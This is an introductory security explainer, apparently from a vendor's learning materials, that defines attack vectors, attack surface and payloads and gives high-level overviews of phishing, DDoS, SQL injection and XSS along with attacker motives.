What is an Attack Vector?

Learning Objectives

  • Learn the concepts of attack vectors, attack surface and payload
  • Explore the various types of attack vectors
  • Understand how an attack vector is used

To take advantage of vulnerabilities, attackers need a path to launch an exploit. An attack vector is the pathway or method threat actors use to breach a network and overcome any cybersecurity defenses. The vector could take advantage of human errors using a phishing attack or leverage an outdated component on server software that leads to a compromise. To build cybersecurity around attack vectors, you must understand the many ways attackers can compromise a system.


What is the difference between an attack vector, an attack surface, and a payload?

An attack vector is a pathway to an exploit, so it’s a critical component in cybersecurity and building defenses. For example, if your users are unaware of the red flags concerning a phishing attack and your defenses don’t include email filters, attackers could leverage human errors to install malware on the network or steal credentials. Social engineering is another popular attack vector used to convince high-privilege users to send money based on a fraudulent invoice or divulge their network credentials.

Threat actors can spend weeks identifying vulnerabilities and the right attack vector to exploit them. Once the attack vector is identified, it can take even longer to exploit it. Attackers will usually create ways to avoid detection once the attack vector is exploited so that they can steal as much data as possible or deliver the best payload. 

Your attack surface is a group of potential risks that could be exploited across the entire environment. When you add more infrastructure to your environment, you add to your attack surface. Cybersecurity experts will advise that you keep your attack surface as small as possible, but some risks are unavoidable. When you must expand your attack surface, cybersecurity defenses are put in place to protect from threats but the risks remain.

Payloads refer to the actions taken by malware or a threat actor. For example, when an attacker installs ransomware on a user computer using a phishing attack, the payload to the organization is encrypted files held hostage until the ransom is paid. Delivering a payload is the final step in a compromise, and it can be minor or extremely damaging to the organization and its data.

Examples of attack vectors

Phishing is one of the most common attack vectors. It’s often combined with social engineering to be the most effective depending on the type of exploit and payload. A phishing attack vector is effective because users are unaware of the numerous red flags in a malicious message. The attacker could include a link to a malicious website, an attachment with a malicious macro, or the attacker could simply pretend to be another user and ask for sensitive information.

A distributed denial-of-service (DDoS) exploits server resources until a botnet used in the attack can crash its services. Large DDoS attacks send gigabytes of data to a targeted server, and renders it unusable. A sophisticated attack can take down critical Internet infrastructure and cause global outages. A denial-of-service (DoS) isn’t always distributed, and some attacks target other services. If an attacker can exploit a vulnerability and interrupt service, they’ve essentially launched a DoS.

Web services can be vulnerable to both SQL injection attacks and cross-site scripting (XSS). In a SQL injection attack, a threat actor sends a specially crafted SQL statement (or several statements) to the SQL server that could perform a number of activities on the server. It’s usually sent via input from a web form, but it can be sent using any interface that uses a SQL server as the backend. An attack could inject malicious code into the SQL server tables, dump data to the frontend, and in sophisticated injection elevate user privileges on the database.

Using an XSS attack vector, a threat actor can inject malicious code into the web page and run actions in the context of the user. If an attacker can steal access tokens during an XSS attack, the token can be used to perform actions on behalf of the user. The malicious payload could be added to the database as well. XSS injected onto the page that does not persist is called reflected XSS, but a malicious payload added to the database is called persistent XSS.

What can threat actors do with attack vectors?

Hacking is a business to some threat actors, so their goals are to monetize their efforts. In some cases, the attacker will be a researcher who will notify the business of the vulnerability and help them fix it.

If the attack is done by a malicious threat actor, the attacker could have several goals. In a DDoS, the attacker wants to limit uptime and crash web services. The threat will persist until the organization can mitigate the issue, which costs the organization money for every minute the service is down.

Destruction of data isn’t the only motive. Stealing data is valuable to an attacker. It can be sold on darknet markets or used in identity theft. If an attacker can steal millions of records, each one could be several dollars on darknet markets, making a data breach extremely profitable.

In corporate espionage, an attacker could be hired to steal intellectual property from the organization. The longer an attacker can remain on the network, the more time they have to exfiltrate more information. This is why monitoring your environment is critical in protecting your network and private data.

It’s time to let data charge